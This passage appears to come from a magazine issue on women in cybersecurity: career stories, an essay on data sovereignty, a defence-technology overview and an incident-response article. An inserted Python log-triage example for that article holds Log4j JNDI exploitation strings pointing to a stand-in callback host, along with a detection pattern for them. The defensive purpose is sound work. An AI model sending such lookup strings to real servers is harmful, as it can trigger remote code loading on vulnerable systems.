Throughout my journey I’ve worked with amazing people from different industries and this exposure has driven me to keep learning. I’ve earned certifications like Certified in Cybersecurity (CC) by (ISC)² and eLearnSecurity Junior Penetration Tester (eJPT) by INE. I’m preparing for more certifications to solidify my expertise.

Cybersecurity is full of challenges, and I thrive on them. Every day brings new problems to solve, whether I’m working with clients, vendors or C-suite executives. These experiences have made me a better communicator and problem-solver: skills crucial in this field.

Looking back, growth isn’t always linear. The past few years have been full of surprises—some good, some tough—but they’ve taught me resilience, adaptability and the importance of continuous learning. In cybersecurity, things are always changing. So staying curious and embracing new experiences is key.

If you’re considering a career switch or entering a competitive field, don’t be afraid to take risks and pivot when necessary. Your career isn’t just about reaching a destination—it’s about the growth you experience along the way. Every challenge is a chance to learn and improve, and every step you take counts.

Building a personal brand and cultivating a professional network have been crucial in my journey. So, keep pushing forward, stay open to new opportunities and remember that every experience contributes to your growth. The future is full of possibilities for those who keep evolving and staying focused on their goals.

x.com/Watiri_bossbabe

www.instagram.com/afriqan_goddess

www.linkedin.com/in/mary-kambo

REBBECA ROBERTS

BEING THERE FOR THE CUSTOMER: FROM BUSINESS DEVELOPMENT ROOKIE TO CYBER SALES SPECIALIST

My focus on delivering value for clients and supporting a series of inspirational female leaders have helped me build a rewarding career in the enterprise space.

In common with many young people I had little idea of what my next move should be when high school ended. Cue the gap year, an experience which taught me, among many other life lessons, that I had an affinity for hard work and the rewards it can generate.

That insight prompted me to search for entry level openings in the sales sector, and when one came up at business intelligence vendor Talend I leapt at the chance. I liked working as a business development rep in London where its UK office was located, and I loved learning the ropes, booking appointments and absorbing as much as I could from my more experienced colleagues.

WOMEN EMPOWERING WOMEN

Two years later an unexpected redundancy saw me looking for work again and I found it with networking solutions vendor Brocade where I had the good fortune to be hired by an inspirational go-getting woman who was my boss for the next 18 months.

It’s wholly thanks to her that I got my start in cybersecurity. Shortly after she had moved on to a more senior role at Fortinet she got in touch to offer me an internal account manager position. I needed a little persuading to take it. Having been in her team previously I was willing to follow her lead wherever it took me, knowing I’d be learning from someone who was ambitious, experienced and smart. The fact that Fortinet was a larger company, and a higher profile brand, was also a bonus. And the role on offer would give me proximity to a first-class technical team, and a fun group of external salespeople.

Not long after joining Fortinet I was given the opportunity to attend some face-to-face client meetings and had the thrill of securing my first big sale, to Burberry, a sizeable account and a sizeable achievement for someone who was essentially still ‘just’ a BDR.

MOVING UP THE RANKS DOWN UNDER

A move to Australia in late 2016 meant looking for work again and, on this occasion, I found it at VMware. Once more I found myself working for and with a series of clever, committed women who were intent on rising to the top of what was, and remains, a male dominated industry. Developing a deep understanding of industry trends and the technologies we were working with while honing my enterprise sales skills helped me transform myself into someone who is able to build trusted, long-term client relationships and drive positive outcomes for organisations.

I’m continuing to do so at Exabeam, a global cybersecurity leader that delivers AI-driven security operations.

I came to the company in mid-2024 via experience at Trend Micro and then Ivanti, where I worked as an account and sales executive, and later director.

These progressively more senior roles enabled me to build connections with leaders and decision makers in some of the country’s largest businesses and organisations, and drive my career forward at a pace that has exceeded my expectations.

It’s difficult for me to overstate my gratitude to the women who’ve inspired and encouraged me on my journey from raw recruit to regional sales manager. Without their support, finding my feet and gaining confidence in what remains a somewhat arcane and heavily male dominated segment of the ICT sector would have been considerably more challenging, and far less enjoyable.

PROVIDING CLARITY AND VALUE

The most important lesson these trusted role models and mentors have taught me is that there’s a real place for cyber specialists who can cut through the noise and navigate a way forward by supplying clients with research, use cases and up-to-the-minute insights.

Staying laser focused on advancing the interests of the businesses we serve rather than on short term rewards, along with my willingness to go the proverbial extra mile when trouble strikes, have helped me forge strong client bonds.

Whether it’s during office hours or at 6am on a Sunday morning, if things turn serious and my customers need clarity and support I’m happy to be their go-to person, not necessarily the person who can give them the answers, but absolutely the person who’ll make sure they get them, and fast.

SEIZING THE OPPORTUNITY

I’ve enjoyed almost every day I’ve spent in the cyber sector and, for my money, there’s no better space in which to work. If you’re a tenacious go-getter who relishes a challenge, there are opportunities aplenty for you to join us and make your mark.

www.linkedin.com/in/rebbeca-roberts-b2931014

ALL THE DOORS THROUGH WHICH I’VE WALKED

When I entered the security industry in the Northern Summer of 2016, I was a fresh graduate from DePauw University, a liberal arts school in Greencastle, Indiana. With my degree in Communications, I was ready to enter the professional world. With absolutely no idea what I wanted to do, or how I wanted to build my professional career, I eagerly accepted a role at Allegion, a supplier of electronic and mechanical security products, in channel marketing and began my now eight year tenure in the industry. As I reflect on the last eight years, I realise my journey has been quite non-linear, but I’ve benefitted from the versatility of roles and organisations that make our industry so multifaceted and exciting.

Across the three organisations I’ve worked for, I’ve had the pleasure of working in the United States, Canada and the United Kingdom, with varying degrees of regional, national and global responsibilities. I started my career in marketing and communications, which was the most challenging way to begin in the industry. It was very difficult to market products and services I hardly understood. However, I very quickly learnt that the industry is special: it’s made up of deeply experienced professionals who have spent 20, 30, 40+ years dedicating themselves to security and access control. Those professionals, both inside and outside the organisations I worked for, offered me guidance, knowledge and mentorship. They showed me their roles, told me about their careers, and asked me what I wanted to do with mine.

LESSON NUMBER ONE FROM THE SECURITY INDUSTRY - IT’S EXCEPTIONALLY RELATIONSHIP BASED.

Building a strong network of supportive, trusted colleagues and industry peers has been my greatest advantage as a young professional.

My experience at Allegion was incredibly rewarding. I moved from working on the mechanical side of access control—locks and door hardware—to the electronic side of the business, technology partnerships and security solutions. From there, I moved deeper into the emerging technology space, focused on how ‘access control’ no longer meant allowing people to enter and exit spaces safely, but, rather, was the means of creating entire building ecosystems built around the human experience. Cool, right? I was immersed in different verticals and learning how the industry had to tailor its sales activities, storytelling, product development and marketing strategies to better align with the user experience. I loved it. However, after five and a half years and working for Allegion in two countries, I felt ready to jump to something new; an organisation in the industry that did things differently. Resigning from Allegion was not easy. I had loved the company and the people I worked beside daily. But, despite the anxiety of not knowing whether I was making the right decision, I knew I needed to give this a try.

Joining smart access technology company Latch in 2021 gave me the opportunity to start over. I was no longer in marketing or partnerships, but in product operations, focused on expanding into the United Kingdom. That role was an intense departure from my comfort zone and skillset, but it exposed me to the critical and strategic elements of business: the decision-making processes behind the curtain. I learned how organisations weigh strategic priorities, create budgets, build financial goals, develop products, research the market and create corporate culture. I was with Latch for about 18 months only, but I had five roles because the organisation gave me a chance to explore different opportunities, and I was willing to take on different responsibilities. At Latch I got my Yellow Belt in Six Sigma, tried my hand at a sales position, built an entire channel enablement program, managed our Canadian business and ultimately landed a role in business operations.

LESSON NUMBER TWO OF THE SECURITY INDUSTRY: SAY YES TO ANY OPPORTUNITY, EVEN IF YOU’RE NOT FULLY PREPARED. THE CHANCE TO LEARN, GROW AND UPSKILL YOURSELF IS A GIFT.

However, things do not always work out as we had hoped. On a Monday in July of 2023, after a two-week vacation, in the first 30 minutes of my day, I went from being anxious about the backlog of work from my time off, to being unemployed. I, like a lot of people, had been affected by a reduction in the workforce. I lost my job, after starting my new role only a few weeks earlier. I felt a deep sense of unease and uncertainty about what was next for me, and about what I wanted.

A few weeks into unemployment, in the midst of job applications and interview processes, I had a pivotal conversation with an industry colleague at Brivo. His question for me was simple: “What do you like to do and what do you want to do? Maybe there’s a fit at our organisation.” That kicked off a series of chats which made me realise the next few years of my career were critical. If I aspired to a leadership role in the industry, I needed a stronger understanding of the business side of a company.

I’m now a year into my role as the senior manager of product operations at Brivo, and it’s been the most challenging role I’ve ever had, in the most rewarding way. I’ve noticed a curiosity for things I never thought twice about: pricing strategies and data privacy regulations. I’m asking more questions because I’m responsible for specific initiatives, and I need guidance. I’m thinking differently. I’m exposed to complex decision-making, and I am learning how to navigate and weigh information, timelines and organisational goals in order to make the best decisions for projects. And I’m proactively trying to close my skill gaps. I live in the world of data now; it’s time for me to take a data analytics course.

Eight years ago, I had no idea what I wanted to do with my career. Now, as a 31 year old, I’m excited because I still don’t know exactly what I want to do. But what I do know is that the industry continues to give me opportunities to explore new avenues, responsibilities and skillsets.

LESSON NUMBER 3 OF THE SECURITY INDUSTRY: WHEN ONE DOOR CLOSES, ANOTHER USUALLY OPENS. THAT’S HOW DOORS WORK.

And while those doors continue to open, I’ll continue to walk through them.

www.linkedin.com/erincmann

AN INSPIRING TALE OF RESILIENCE, FOCUS, AND DETERMINATION FROM AN IT PROFESSIONAL TRANSITIONING INTO CLOUD SECURITY

WHAT’S HER JOURNEY: FINDING MY PATH IN CLOUD SECURITY

Navigating the tech industry is like traversing a vast, constantly changing landscape. It’s exciting and brimming with opportunities, but also filled with challenges that can test even the most determined individuals. My journey into cloud security has been one of perseverance, self-discovery and relentless pursuit of growth, despite the obstacles along the way.

THE CHALLENGE OF FINDING DIRECTION IN TECH

Starting out, the ever-expanding world of tech was both thrilling and overwhelming. With new technologies emerging every day, deciding where to focus was one of my first hurdles. Should I pursue artificial intelligence? Ethical hacking? Data analytics? Cybersecurity eventually stood out because of its vital role in protecting systems and people in a digital-first world.

Even within cybersecurity, finding a niche was a challenge. I experimented with various disciplines—penetration testing, network security and even blockchain. But cloud security ultimately felt like the perfect fit, combining my interest in cutting-edge technology with the protection of dynamic, scalable infrastructures. Choosing to specialise meant sacrificing my exploration of other areas of interest, but it was a decision that gave my career clarity and direction.

THE HIRING DISCONNECT: BARRIERS TO ENTRY

One of the most frustrating realities of breaking into tech was the hiring disconnect for entry-level roles. Despite having hands-on experience, a solid educational background and multiple internships, I constantly encountered job descriptions requiring five or more years of experience for ‘junior’ positions. It was disheartening to see roles I knew I was capable of handling but could not apply for because I lacked the arbitrary years of experience or certifications listed as prerequisites. Even after earning my master’s degree in cybersecurity, I encountered this barrier repeatedly, forcing me to rethink my approach to entering the field.

THE HIGH COST OF CERTIFICATIONS

Another significant challenge was the financial burden of obtaining certifications. For someone starting out in Nigeria, certifications like AWS Certified Solutions Architect or CompTIA Security+ are essential for proving technical expertise, but their costs were often prohibitively high due to the instability of foreign exchange rates.

Balancing the cost of certifications with daily expenses meant months of planning and saving for each exam. Despite these challenges, I saw certifications as an investment in myself and my future, so I worked tirelessly to earn them one at a time. Each credential represented not just knowledge, but also the sacrifices I had made to acquire it.

NETWORKING AND MENTORSHIP: BUILDING A SUPPORT SYSTEM

Breaking into tech is not only about skills; it’s also about who you know and how well you can learn from others. Initially, I struggled with a lack of mentorship and networking opportunities, which made the journey feel isolating. However, my involvement in the Cybergirls Fellowship turned this around.

The Fellowship provided me with a support system of like-minded individuals and mentors who offered guidance, encouragement and practical advice. It was a pivotal moment in my career, helping me build confidence and a professional network that continues to support my growth.

OVERCOMING IMPOSTER SYNDROME AND FIERCE COMPETITION

Imposter syndrome was another hurdle I had to overcome. With so many talented candidates vying for limited positions, it was easy to doubt my abilities and question whether I belonged in such a competitive field.

However, I learnt to reframe my mindset. Instead of comparing myself to others, I focused on celebrating my progress and unique journey. I reminded myself that every skill I acquired and every certification I earned was proof of my capabilities. Over time, this shift in perspective allowed me to navigate the competitive job market with greater resilience and confidence.

TRANSITIONING FULLY TO CLOUD SECURITY

While I currently balance roles in IT administration and cloud security, my goal is to transition fully into a dedicated cloud security role. This requires me to deepen my technical expertise and share my experiences to inspire others breaking into the cybersecurity industry.

By continuing to write about my journey, I hope to shed light on the realities of entering tech—both the challenges and the rewards. I want to show others that, while the path may be difficult, it is also incredibly fulfilling.

LESSONS LEARNT ON MY JOURNEY

Reflecting on my journey, a few key lessons emerge:

1. Tech is vast, but finding a niche allows you to build depth and expertise that make you stand out.

2. Invest in yourself: Certifications and training are worth the time and effort, even when the financial burden feels heavy, but practical, hands-on skills are more important.

3. Surrounding yourself with supportive mentors and peers can make all the difference (community is everything). As one of my mentors rightfully said, “we rise by lifting others”.

4. There will always be challenges, but persistence and adaptability are crucial for overcoming them.

RISING THROUGH RESILIENCE

My journey into cloud security has been shaped by challenges—financial hurdles, hiring disconnects, imposter syndrome—but it has also been defined by resilience and growth. Each obstacle I’ve faced has taught me valuable lessons about the importance of focus, community and perseverance.

As I look ahead to the next phase of my career, I remain committed to pushing boundaries, breaking barriers and inspiring others to do the same. The path to success in tech may not be easy, but it is undoubtedly worth the effort required to travel it.

www.linkedin.com/in/cyberrey

www.youtube.com/@reyincyber

github.com/reyincyber

cyberrey.medium.com


TECHNOLOGY PERSPECTIVES

FROM ASHES TO POWER: THE PHOENIX OF DATA SOVEREIGNTY RISES

In today’s digital landscape a new dawn of data sovereignty is emerging. Our world, once marked by the free flow of data across borders, is now witnessing a resurgence of national control, a rebirth akin to the phoenix rising from its ashes. Countries are reclaiming authority over the data generated within their borders, transforming it into a force of empowerment, security and innovation. For international AI companies this shift requires resilience and adaptation as they navigate the challenges posed by data localisation policies. This new age of sovereignty is both a trial and an opportunity demanding transformation that fuels growth and strengthens digital security.

THE RISE OF DATA SOVEREIGNTY: A REBIRTH OF CONTROL

Data sovereignty reflects a nation’s desire to safeguard its digital assets, much like a phoenix rising anew, carrying forward the essence of its former self. Localisation policies mandate that data collected within a country’s borders remains stored and processed there, igniting a powerful movement to protect national security, economic interests and privacy. From the European Union to India, governments are increasingly asserting control over digital resources, reshaping the rules of engagement for companies operating internationally.

This resurgence isn’t just about protecting data, it’s about reclaiming power in a globalised world. Countries like India, China and Brazil have initiated strict localisation rules to prevent data exploitation by foreign entities, bringing data sovereignty to the forefront of digital policy. In a world where data has become the lifeblood of innovation, this resurgence signals a monumental shift.

TRIALS BY FIRE: AI COMPANIES IN A NEW REGULATORY ERA

For international AI companies, data sovereignty policies present a huge challenge. Adhering to localisation requirements is costly and complex, demanding infrastructure investments such as local data centres, and jurisdiction-specific data handling practices. These companies must reinvent their strategies and adapt to fragmented data rules without compromising their innovation edge. Like the phoenix, they are reshaping themselves in the face of these fiery trials, building resilience and fostering trust among global consumers.

The EU’s General Data Protection Regulation (GDPR) and India’s Digital Personal Data Protection (DPDP) Act embody this new age of regulation. GDPR, one of the world’s most stringent data protection laws, mandates that data transferred outside the EU meet ‘adequacy’ standards that ensure comparable protection in the receiving country. Companies like Uber have faced steep fines for breaching these requirements, underscoring the financial and operational risks of non-compliance. The €290 million penalty imposed on Uber for unauthorised data transfers highlights the consequences of failing to adhere to GDPR’s rigorous standards and serves as a reminder of the fire that companies must pass through to comply with these reborn data norms.

INDIA’S DPDP ACT: A PHOENIX OF SOVEREIGNTY IN EMERGING ECONOMIES

In emerging markets like India, data sovereignty takes on unique importance, symbolising a resurgence of control. India’s DPDP Act enforces data localisation and restricts cross-border transfers of sensitive data to ensure national security and economic independence.

This rebirth of sovereignty over data presents both a challenge and an opportunity for AI companies seeking to harness the vast potential of India’s diverse digital market. For these companies, the DPDP Act’s requirements translate into a need for domestic storage solutions and local compliance strategies, adding costs but also embedding trust among Indian consumers. Just as the phoenix rises stronger after each rebirth, AI companies that succeed in complying with the DPDP Act’s standards emerge as trusted and resilient players, capable of navigating complex regulatory landscapes.

INNOVATION THROUGH RESILIENCE: A BALANCING ACT

The push for data sovereignty creates a delicate balance between national security and innovation. Localisation policies may restrict data flows, creating ‘data silos’ that limit the scope of machine learning and predictive algorithms. However, these constraints also drive innovation in data management and AI design, pushing companies to adapt creatively. By developing local solutions and aligning their operations with regional regulations, AI companies are reborn as champions of compliance and trust.

In response, some regions are exploring controlled data-sharing frameworks, like the EU-US Data Privacy Framework, to maintain the benefits of cross-border data access while respecting sovereignty. These collaborations symbolise the phoenix’s ascent, a striving for a world where nations and companies alike can protect data privacy while fostering global innovation.

A VISION OF COLLABORATION AND SOVEREIGNTY

The future of data sovereignty lies in collaborative frameworks that honour each nation’s unique needs while enabling the interconnectedness essential to digital progress. As governments recognise the value of a globally connected ecosystem, new standards for data sharing will arise offering a harmonious path between privacy, security and innovation. GDPR and the DPDP Act set foundational precedents, but a united approach that respects both sovereignty and the power of a connected digital world will define the next era.

A PHOENIX RISEN, READY FOR THE FUTURE

The resurgence of data sovereignty is a powerful movement in the digital age, representing a rebirth of control, security and innovation. Just as the phoenix rises anew, countries and companies are reshaping themselves in response to evolving data policies. This transformative journey signals the dawn of a new, resilient digital world; one where nations protect their citizens’ privacy and in which AI companies rise to the challenge, building a future of trust and security across borders.

ABOUT PAMEELA GEORGE

Pameela George is a multifaceted professional with expertise spanning law, marketing, sales, retail, and content creation. With a unique ability to synthesize insights from diverse industries, she specializes in privacy law and AI-driven solutions, crafting forward-thinking strategies and thought leadership. Recognised for her published works and dynamic approach, Pameela aims to drive innovation and clarity in an ever-evolving digital landscape.

MODERN CYBERSECURITY: BUILDING A RESILIENT DEFENCE

In today’s digital world cybersecurity professionals face an evolving landscape of threats that demand both innovation and vigilance. Yet, as tools and technologies advance, it’s easy to get lost in buzzwords and trends. What are the real game changers in security technology today? How can organisations integrate them effectively to build a resilient defence?

This article delves into the technologies shaping the future of cybersecurity and provides actionable steps to implement them.

1. EMBRACING ZERO TRUST: A DYNAMIC APPROACH TO ACCESS CONTROL

Zero trust is no longer a buzzword, it’s a fundamental shift in how access control is managed. Unlike traditional models, zero trust operates on the principle of ‘never trust, always verify’. Every access request is scrutinised in real-time using contextual factors such as user identity, device health and location.

For example, a financial institution may implement zero trust to ensure that even employees on the corporate network cannot access sensitive data without multifactor authentication and device compliance. By piloting zero trust policies on critical applications first, organisations can minimise disruptions while testing their effectiveness.

Key implementation tip: start by mapping your network to identify sensitive assets and apply zero trust policies incrementally. Deploy robust identity verification mechanisms, such as biometric authentication or hardware tokens, to enhance security without hampering usability.
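A sketch of the access decision described in this section, as an added example (not code from the article or from any product): each request is judged on identity, MFA, device compliance and location, the corporate-network flag is deliberately ignored, and resources outside the pilot are evaluated in report-only mode. The asset map, country list and all names are assumptions.

```python
from dataclasses import dataclass, replace
from enum import Enum


class Decision(Enum):
    ALLOW = "allow"
    STEP_UP = "require_mfa"   # prompt for a second factor, then re-evaluate
    DENY = "deny"


@dataclass(frozen=True)
class Request:
    user: str
    authenticated: bool         # primary credential verified
    mfa_passed: bool
    device_compliant: bool      # e.g. managed, patched, disk encrypted
    country: str                # coarse location signal
    on_corporate_network: bool  # kept for logging, never used to grant trust
    resource: str


@dataclass(frozen=True)
class Verdict:
    decision: Decision
    reason: str
    enforced: bool              # False = report-only (not yet in the pilot)

    def effective(self) -> Decision:
        """What the user experiences: report-only verdicts are logged, not applied."""
        return self.decision if self.enforced else Decision.ALLOW


# Assumed asset map from the network-mapping step: (sensitivity, enforced).
ASSETS = {
    "payments-db": ("high", True),      # critical application, piloted first
    "hr-records": ("high", True),
    "intranet-wiki": ("low", False),    # not yet enforced
}
ALLOWED_COUNTRIES = {"AU", "NZ"}        # assumed policy value


def evaluate(req: Request) -> Verdict:
    # Unmapped resources are judged as high sensitivity in report-only mode,
    # so gaps in the asset map show up in the logs without breaking access.
    sensitivity, enforced = ASSETS.get(req.resource, ("high", False))

    def verdict(decision, reason):
        return Verdict(decision, reason, enforced)

    if not req.authenticated:
        return verdict(Decision.DENY, "identity not verified")
    if sensitivity == "high":
        if req.country not in ALLOWED_COUNTRIES:
            return verdict(Decision.DENY, "location outside policy")
        if not req.device_compliant:
            return verdict(Decision.DENY, "device not compliant")
        if not req.mfa_passed:
            return verdict(Decision.STEP_UP, "MFA required for sensitive data")
        return verdict(Decision.ALLOW, "all signals satisfied")
    # Low sensitivity: a weak signal triggers a second factor rather than a block.
    weak = (not req.device_compliant) or (req.country not in ALLOWED_COUNTRIES)
    if weak and not req.mfa_passed:
        return verdict(Decision.STEP_UP, "weak context, MFA required")
    return verdict(Decision.ALLOW, "low sensitivity, context acceptable")


if __name__ == "__main__":
    # Constructed requests: an employee on the corporate network without MFA.
    staff = Request("teller01", True, False, True, "AU", True, "payments-db")
    cases = [
        staff,
        replace(staff, mfa_passed=True),
        replace(staff, mfa_passed=True, device_compliant=False),
        replace(staff, resource="intranet-wiki", device_compliant=False),
    ]
    for r in cases:
        v = evaluate(r)
        print(r.resource, v.decision.value, v.reason, "enforced" if v.enforced else "report-only")
```

Counting report-only verdicts that would have been a deny or step-up gives a measure of likely disruption before a resource is moved into enforcement.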

2. THE RISE OF AI IN THREAT DETECTION

Artificial intelligence (AI) and machine learning (ML) are transforming threat detection by moving it beyond signature-based methods. AI analyses vast datasets to detect patterns and anomalies that human analysts might miss. For example, AI tools like IBM QRadar or Darktrace can spot insider threats by identifying unusual access patterns or abnormal file transfers.

In one case a healthcare provider used AI to detect ransomware early by analysing deviations in network traffic, preventing an attack before it could encrypt critical patient data.

Key implementation tip: choose AI tools that integrate seamlessly with your existing infrastructure. Train your team to interpret AI-generated insights effectively, ensuring that the technology complements human expertise rather than overwhelming it with data.

3. STRENGTHENING CLOUD SECURITY FOR HYBRID ENVIRONMENTS

With organisations increasingly adopting hybrid cloud models, securing data and applications across multiple environments has become paramount. Cloud security tools such as cloud security posture management (CSPM) and container security solutions offer comprehensive protection.

Take the example of a retail organisation managing customer data on both on-premises servers and cloud platforms. By implementing robust identity and access management (IAM) policies the company ensured employees could access only the specific resources they needed, reducing exposure to breaches.

Key implementation tip: regularly audit cloud configurations and ensure encryption of data in transit and at rest. Adopt tools that offer visibility across hybrid environments, enabling quick identification and resolution of vulnerabilities.

4. AUTOMATING SECURITY WITH SOAR PLATFORMS

Security orchestration, automation and response (SOAR) platforms are invaluable for overburdened security teams dealing with ‘alert fatigue’. These platforms automate repetitive tasks such as isolating compromised endpoints or updating firewall rules, allowing teams to focus on complex threats.

For example, a manufacturing firm used SOAR to streamline incident response, reducing average response times from hours to minutes by automating low-level alerts.

Key implementation tip: start by automating predictable tasks such as resetting compromised user credentials. Gradually expand the scope of automation to include more complex workflows like coordinated responses across multiple systems.

5. PRACTICAL STEPS TO INTEGRATE THESE TECHNOLOGIES

Adopting advanced security technologies requires careful planning and execution. Here are actionable steps to ensure successful integration.

• Conduct a comprehensive risk assessment: identify high-priority areas where these technologies can have the most impact, such as protecting sensitive data or securing remote access.

• Activate advanced features in existing tools: many tools, such as Check Point or Fortigate firewalls, already support advanced functionalities like automated threat response. Enabling these features can enhance security without requiring additional investment.

• Upskill your team: technology is only as effective as the people managing it. Focus on targeted training programs to help your team master newly implemented tools, ensuring they can maximise their potential.

REAL-WORLD EXAMPLES: INNOVATION IN ACTION

These technologies are already making waves across industries.

1. Healthcare: a hospital leveraged AI to detect phishing attempts targeting its staff, reducing successful breaches by 70 percent.

2. Retail: a major e-commerce platform used zero trust to secure customer data, ensuring compliance with global privacy regulations.

3. Finance: a bank adopted SOAR to automate fraud detection, leading to faster resolution times and improved customer trust.

THE TAKEAWAY: ADAPTATION IS KEY

Cybersecurity is an ever-evolving field and staying ahead of threats requires both technological innovation and adaptability. By embracing zero trust, AI, cloud security and automation organisations can build proactive defences that address current risks while preparing for future challenges.

Next steps: begin with a small pilot project such as AI-driven threat detection and measure its impact. Use those results to scale your efforts, ensuring that each new technology adds measurable value.

By fostering a culture of continual learning and strategic implementation security teams can navigate the complexities of the digital world with confidence and resilience.

ABOUT AUTHOR

Anita Nnamdi is a passionate network and cybersecurity professional with a proven track record in building secure, resilient systems for organisations of all sizes. I focus on innovation and strategic problem solving, and I am dedicated to empowering businesses to stay ahead of evolving cyber threats while promoting diversity and inclusion within the industry.

www.linkedin.com/in/anita-nnamdi-i12/

EFFECTIVE INCIDENT RESPONSE AND RECOVERY ELEMENTS

What does it take for an organisation to return to normal operations after experiencing a security-related incident or crisis? Foundational aspects, documented in an incident response plan and practiced so the specified activities and actions become muscle memory, are key.

A favoured approach to security incident response, as defined by the National Institute of Standards and Technology, is shown in Figure 1: Incident Response Life Cycle.

(Source: Computer Security Incident Handling Guide, https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf)

MARISE ALPHONSO

Figure 1: Incident Response Life Cycle

The preparation phase of incident response encompasses several security practices that an organisation must have in place to facilitate effective recovery in the event of a security incident. Key aspects that must be considered, discussed and documented include: incident response team member contact details, communication mechanisms to be used (and alternates that would be required if the primary mechanism is impacted), toolsets for incident tracking and documentation, external assistance retainers for digital forensics and cyber insurance, organisational network and system architecture topology diagrams and standby devices for emergency use.

As shown in Figure 1, incident response activities are not entirely linear. Depending upon the type of incident they could require iterations between the detection and analysis phase and the containment, eradication and recovery phase. Two security incidents I was involved in demonstrated exactly this non-linearity and highlighted for me that a post-incident ‘lessons learnt’ exercise is critical to creating a feedback loop that leads to improvements in the preparation phase.

Incident One (December 2018) involved a colleague’s Microsoft 365 email account being compromised and used to solicit iTunes gift cards from their email contacts. This compromise was made possible because multifactor authentication (MFA) was not deployed on the account at the time, but it was not clear how the account password had been compromised. It may have been via a man-in-the-middle attack on an insecure open WiFi network. A fellow colleague, having received the iTunes gift card email, was quick to check in with the email account owner to verify the authenticity of the email. When it was found to be spurious, access to the account was immediately blocked and the password changed.

An investigation began in which Microsoft logs were reviewed to determine how access might have been obtained and identify any additional unauthorised actions. This investigation revealed that the mailbox also held client spreadsheet files containing information of a personal nature. This was immediately a red flag due to reporting obligations under the Notifiable Data Breach scheme of the Australian Privacy Act (1988). While the organisation did not have a formal, documented incident response process at the time, there was sufficient knowledge in the incident response team to determine whether this was a breach that had to be notified to affected individuals and the Office of the Australian Information Commissioner, under the requirements of the Notifiable Data Breach scheme. A considered assessment of the risk of serious harm, based on the affected personal information, was made and it was determined that the risk was low.

KEY LESSONS:

• Enable multifactor authentication. This is critically important for all user accounts with access to information of a sensitive or critical nature.

• Configure logging. Determine the minimum requirements for logging events on your key IT systems and applications.

• Understand compliance requirements. Know the information security and data protection obligations imposed on your industry and sector.

• Promote awareness of prevalent threats. Communicate threats to employees across the organisation.

Incident Two (December 2021) occurred when the organisation’s outsourced security operations centre (SOC) analysts noticed an indicator of compromise for the Log4j vulnerability on an organisational IT system. Apache Log4j is an open-source Java logging library used in thousands of software products from hundreds of vendors. This vulnerability (with a CVSS rating of 10) could have allowed malicious actors to take control of IT systems or networks. An incident ticket was opened and, upon review by the internal team, it was noted that the affected system had been updated to a recent version of Log4j. However, the compromise may have happened before the update was performed. The impacted IT system held customer information that could have been accessed. Collaboration between the SOC and the internal team over several days ensued, during which an extract of server logs was reviewed to ascertain the actions taken by the malicious actor. It was determined that no sensitive information had been accessed, and the IT system was rebuilt to eradicate any potential backdoors that may have been installed.

KEY LESSONS:

• Consider procuring the services of a SOC. The benefit of having experts look over IT systems events 365x24x7 for any indicators of compromise cannot be overstated.

• Subscribe to threat intelligence feeds. These will provide an indication of prevalent threats that may impact your organisation or your third parties.

• Enable logging. In the event of a compromise, determining the actions taken by malicious actors is critical to the development of a suitable response.

• Define asset inventories. Documenting IT systems and vendor inventories is key to providing a list of potentially impacted systems and of vendors who need to be communicated with as part of the incident response process.

• Formalise your incident response team. Ensure the roles and responsibilities of an incident response team are established to facilitate internal collaboration in the event of an incident.
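The timeline question raised in Incident Two (did exploitation attempts reach the system before the Log4j update was deployed?) can be answered from web access logs. The following is an added example, not part of the original article or the organisation's tooling; the log lines, the patch time and the function names are constructed assumptions.

```python
"""Triage access-log lines for Log4j JNDI lookup strings against a patch time."""
import re
from collections import namedtuple
from datetime import datetime, timezone
from urllib.parse import unquote

# Constructed sample: "combined"-format access log lines, documentation IPs only.
SAMPLE_LOG = """\
198.51.100.7 - - [09/Dec/2021:22:14:03 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.50 - - [10/Dec/2021:03:41:19 +0000] "GET /search?q=%24%7Bjndi%3Aldap%3A%2F%2Fcallback.example.invalid%2Fa%7D HTTP/1.1" 200 1024 "-" "curl/7.79"
203.0.113.50 - - [10/Dec/2021:03:41:25 +0000] "GET /health HTTP/1.1" 200 12 "-" "${JNDI:ldap://callback.example.invalid/b}"
192.0.2.99 - - [12/Dec/2021:15:02:44 +0000] "GET /api?id=${jndi:dns://callback.example.invalid} HTTP/1.1" 404 0 "-" "scanner"
this line is truncated and will be counted as unparsed
"""

# Assumption: the time the Log4j update was deployed, taken from change records.
PATCHED_AT = datetime(2021, 12, 11, 9, 0, tzinfo=timezone.utc)

LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
Hit = namedtuple("Hit", "when src field status")


def normalise(value):
    """Percent-decode twice (covers double encoding) and lower-case."""
    return unquote(unquote(value)).lower()


def find_hits(log_text):
    """Return (hits, unparsed_count) for lines carrying a JNDI lookup string."""
    hits, unparsed = [], 0
    for line in log_text.splitlines():
        if not line.strip():
            continue
        m = LINE_RE.match(line)
        if not m:
            # Count lines we could not read so gaps in coverage stay visible.
            unparsed += 1
            continue
        when = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        # The string can arrive in any logged, attacker-controlled field.
        for field in ("req", "ref", "ua"):
            if "${jndi:" in normalise(m[field]):
                hits.append(Hit(when, m["src"], field, int(m["status"])))
                break
    return hits, unparsed


def triage(hits, patched_at):
    """Split hits by whether they arrived before the patch was deployed."""
    before = [h for h in hits if h.when < patched_at]
    after = [h for h in hits if h.when >= patched_at]
    return {
        "before_patch": before,
        "after_patch": after,
        # Any pre-patch hit means the host may have been exposed while vulnerable.
        "needs_deep_review": bool(before),
    }


if __name__ == "__main__":
    found, skipped = find_hits(SAMPLE_LOG)
    result = triage(found, PATCHED_AT)
    for h in result["before_patch"]:
        print(f"PRE-PATCH  {h.when.isoformat()} {h.src} field={h.field} status={h.status}")
    for h in result["after_patch"]:
        print(f"POST-PATCH {h.when.isoformat()} {h.src} field={h.field} status={h.status}")
    print(f"unparsed lines: {skipped}; deep review needed: {result['needs_deep_review']}")
```

A hit records an attempt, not a successful exploit, and a literal match will miss obfuscated lookup strings, so pre-patch hits are a trigger for host-level review rather than a verdict.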

The internal team in both Incident One and Incident Two had performed foundational steps as part of the preparation phase of incident response. However, improvements were identified during the post-incident activity. Effective recovery from a security incident requires attention be paid to each phase of the response process. Preparation is the ultimate key to recovery and resurgence.

